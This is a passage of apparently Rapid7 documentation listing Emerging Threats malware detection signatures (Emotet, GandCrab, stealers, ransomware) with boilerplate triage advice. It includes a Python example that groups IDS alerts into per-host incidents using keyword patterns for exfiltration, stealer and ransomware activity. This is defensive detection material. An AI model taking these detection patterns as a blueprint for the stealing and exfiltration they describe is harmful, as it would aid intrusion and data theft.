This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer - Uploading System Information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Comisproc Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Comotor.A!dll Reporting 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CONFUCIUS_B CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CONFUCIUS_B External IP Check to CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer Installer Started

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cridex Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Crypren/Zcrypt Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 Ransomware Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 / Revenge Ransomware Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptInject.BE!MTB Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Crypt.nc Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cryptrun.B Connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cryptrun.B/MSUpdater C&C traffic 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CryPy Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryPy Ransomware Encrypting File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/DanaBot Harvesting Email Addresses 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanaBot Harvesting Email Addresses 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot CnC Task Status

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkRAT CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkWatchman Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkWatchman Checkin Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Datamaikon Checkin myAgent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Datper CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DCRat CnC Exfil

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Delf.TJJ Variant CnC Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32 Dialer Variant

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Dipverdle.A Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/DMA Locker CnC Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Dofoil.L Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Dorv Stealer Exfiltrating Data to CnC

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/DownloadAdmin Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Downloader.Small.BIL CnC Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.Drun Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Dynamer Trojan Dropper User-Agent VB Http

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emold.C Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet.C Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M11

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M3

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M4

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M5

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M6

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M7

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M8

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M9

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Checkin (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Checkin Response

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Emotet HTML Template Response

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.
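The Emotet entries above are more than a dozen signature variants (M2 through M11, Checkin, Checkin Response, HTML Template Response) for a single family, and every one of them carries the same recommendation: review, then rebuild the host and reset the user's password. In practice an analyst wants those variant hits collapsed into one incident per internal host, with the flow direction handled correctly, because a "Checkin Response" rule fires on server-to-client traffic, so its src_ip is the command-and-control server rather than the victim. The following added example (not Rapid7's or Emerging Threats' code) shows one way to do that. It assumes the sensor's alerts are available as Suricata-style EVE records with src_ip, dest_ip and alert.signature fields, the keyword-to-behaviour mapping and the internal address ranges are assumptions to adapt, and SAMPLE_ALERTS is a constructed sample built from signature names on this page.

```python
"""Cluster Insight Network Sensor IDS alerts into per-host incidents.

Added example, not Rapid7's or Emerging Threats' code. Assumes alerts are
Suricata-style EVE records (assumption); SAMPLE_ALERTS is constructed.
"""
import ipaddress
import re

# ET signature names follow "ET <CATEGORY> [Win32/|Win32.]<Family> <text> [variant]".
SIG_RE = re.compile(
    r"^ET (?P<category>[A-Z]+) (?:Win32[/.])?(?P<family>[A-Za-z0-9_-]+)(?P<rest>.*)$"
)
# Trailing variant markers seen on the page: "M2".."M11", "(2)", "Beacon 1".
VARIANT_RE = re.compile(r"\s+(?P<variant>M\d+|\(\d+\)|\d+)$")

# Keyword-to-behaviour heuristic over the signature text (assumption; first hit wins).
BEHAVIOURS = [
    ("ransomware", ("Ransomware",)),
    ("exfil", ("Exfil", "Upload", "Dump", "Sending", "Stealer")),
    ("c2", ("CnC", "Checkin", "Check-in", "Beacon")),
    ("stage", ("Download", "Requesting", "Retrieving", "Dropper", "Payload")),
]
PRIORITY = {"ransomware": 4, "exfil": 3, "c2": 2, "stage": 1, "other": 0}
# The page's recommendation (rebuild + password reset) plus follow-ups (assumption).
ACTIONS = {
    "ransomware": "isolate host; rebuild from known-good source; reset user password; verify backups (T1486)",
    "exfil": "rebuild from known-good source; reset user password; scope what data left (T1041)",
    "c2": "rebuild from known-good source; reset user password",
    "stage": "review alert; confirm whether the payload ran before rebuilding",
    "other": "review alert",
}
# Replace with the organisation's own address space (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_signature(signature):
    """Split an ET signature name into category, family, variant and behaviour."""
    m = SIG_RE.match(signature)
    if not m:
        return {"category": None, "family": None, "variant": None, "behaviour": "other"}
    rest, variant = m.group("rest"), None
    vm = VARIANT_RE.search(rest)
    if vm:
        variant, rest = vm.group("variant"), rest[: vm.start()]
    behaviour = next((label for label, kws in BEHAVIOURS if any(k in rest for k in kws)), "other")
    return {"category": m.group("category"), "family": m.group("family"),
            "variant": variant, "behaviour": behaviour}


def victim_host(alert):
    """Return the internal endpoint whichever direction the rule fired on: a
    '... Checkin Response' signature matches server->client traffic, so there
    src_ip is the C2 server, not the victim."""
    for ip in (alert["src_ip"], alert["dest_ip"]):
        if any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS):
            return ip
    return alert["src_ip"]


def build_incidents(alerts):
    """One incident per internal host; the most severe behaviour sets the action."""
    incidents = {}
    for a in sorted(alerts, key=lambda x: x["timestamp"]):
        sig = parse_signature(a["alert"]["signature"])
        if sig["category"] != "MALWARE":
            continue  # the rebuild/reset recommendation is for ET MALWARE hits
        host = victim_host(a)
        peer = a["dest_ip"] if host == a["src_ip"] else a["src_ip"]
        inc = incidents.setdefault(host, {
            "host": host, "families": set(), "behaviours": set(), "signatures": set(),
            "peers": set(), "first_seen": a["timestamp"], "last_seen": a["timestamp"],
            "alert_count": 0,
        })
        inc["families"].add(sig["family"])
        inc["behaviours"].add(sig["behaviour"])
        inc["signatures"].add(a["alert"]["signature"])
        inc["peers"].add(peer)
        inc["last_seen"] = a["timestamp"]
        inc["alert_count"] += 1
    for inc in incidents.values():
        inc["priority"] = max(inc["behaviours"], key=PRIORITY.__getitem__)
        inc["action"] = ACTIONS[inc["priority"]]
    return incidents


def triage_order(incidents):
    """Hosts ordered by severity, then by how many rules fired."""
    return sorted(incidents.values(), key=lambda i: (-PRIORITY[i["priority"]], -i["alert_count"]))


# Constructed sample: four Emotet variant rules on one host (one of them a
# server->client response), a ransomware + stealer pair, a stager, and noise.
def _a(ts, src, dst, sig):
    return {"timestamp": ts, "src_ip": src, "dest_ip": dst, "alert": {"signature": sig}}

SAMPLE_ALERTS = [
    _a("2024-05-01T09:12:03", "10.0.0.5", "203.0.113.10", "ET MALWARE Win32/Emotet CnC Activity (POST) M2"),
    _a("2024-05-01T09:12:04", "10.0.0.5", "203.0.113.10", "ET MALWARE Win32/Emotet CnC Activity (POST) M3"),
    _a("2024-05-01T09:12:05", "203.0.113.10", "10.0.0.5", "ET MALWARE Win32/Emotet CnC Checkin Response"),
    _a("2024-05-01T09:15:40", "10.0.0.5", "203.0.113.10", "ET MALWARE Win32/Emotet CnC Activity (POST) M11"),
    _a("2024-05-01T09:20:11", "10.0.0.9", "198.51.100.7", "ET MALWARE Win32/GandCrab Ransomware CnC Activity M2"),
    _a("2024-05-01T09:21:02", "10.0.0.9", "198.51.100.7", "ET MALWARE Win32/Dorv Stealer Exfiltrating Data to CnC"),
    _a("2024-05-01T09:30:00", "10.0.0.21", "198.51.100.7", "ET MALWARE Win32/IcedID Requesting Encoded Binary M4"),
    _a("2024-05-01T09:30:01", "10.0.0.21", "203.0.113.10", "SURICATA STREAM excessive retransmissions"),
]

if __name__ == "__main__":
    for inc in triage_order(build_incidents(SAMPLE_ALERTS)):
        print(f"{inc['host']}: {inc['priority']:<10} {sorted(inc['families'])} "
              f"x{inc['alert_count']} -> {inc['action']}")
```

On the sample, the four Emotet alerts fold into one c2 incident for 10.0.0.5 with 203.0.113.10 as the only peer, the GandCrab plus Dorv pair on 10.0.0.9 is ranked first as ransomware, and the non-ET stream event is ignored. The family token is a heuristic: it works for names like Win32/Emotet and Win32.FakeAV.chhq but yields the first word for multi-word families such as "DMA Locker", so treat it as a grouping key rather than a canonical name.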

ET MALWARE Win32/Enchanim Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Enchanim Process List Dump

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Enemyfear Stealer Exfil

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Enosch.A gtalk connectivity check

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Eris Ransomware CnC Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this family is ransomware, also check the host and any shares it can reach for encrypted files and confirm that backups are intact.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Expiro.CD Check-in

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fake Anti-Pegasus AV CnC Exfil

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.FakeAV.chhq Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.FakeAV POST datan.php

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.FakeAV.Rean Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/FakeSysdef Rogue AV Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/FakeXPA Checkin URL

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin (2)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fareit Checkin 2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fareit Variant Activity (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Final1stspy CnC Checkin (Reaper/APT37 Stage 1 Payload)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fireball Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fluxer CnC Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Formgrabber Data Exfil

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fosniw CnC Checkin Style 2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fosniw MacTryCnt CnC Style Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fujacks Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Fujacks Variant CnC Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/GandCrab Ransomware CnC Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this family is ransomware, also check the host and any shares it can reach for encrypted files and confirm that backups are intact.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/GandCrab Ransomware CnC Activity M2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

